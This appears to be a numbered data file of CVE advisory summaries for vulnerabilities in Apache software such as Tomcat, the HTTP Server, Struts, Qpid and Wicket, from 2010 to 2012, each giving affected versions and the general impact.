3017| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
3018| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
3019| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
3020| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
3021| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
3022| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
3023| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
3024| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
3025| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
3026| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
3027| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
3028| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
3029| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
3030| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
3031| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
3032| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
3033| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
3034| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
3035| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
3036| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
3037| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
3038| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
3039| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
3040| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
3041| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
3042| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
3043| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
3044| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
3045| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
3046| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
3047| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
3048| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
3049| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
3050| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
3051| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
3052| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
3053| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
3054| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
3055| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
3056| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
3057| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
3058| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
3059| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
3060| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
3061| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
3062| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
3063| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
3064| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
3065| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
3066| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
3067| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
3068| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
3069| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
3070| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
3071| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
3072| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
3073| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
3074| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
3075| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
3076| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
3077| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
3078| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
3079| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
3080| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
3081| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
3082| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
3083| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
3084| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
3085| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
3086| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
3087| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
3088| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
3089| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
3090| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
3091| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
3092| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
3093| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
3094| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
3095| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
3096| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
3097| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
3098| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
3099| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
3100| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
3101| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
3102| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
3103| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
3104| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
3105| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
3106| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
3107| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
3108| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
3109| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
3110| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
3111| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
3112| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
3113| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
3114| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
3115| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
3116| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
3117| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
3118| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
3119| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
3120| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
3121| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
3122| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
3123| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
3124| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
3125| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
3126| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
3127| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
3128| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
3129| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
3130| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
3131| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
3132| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
3133| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
3134| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
3135| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
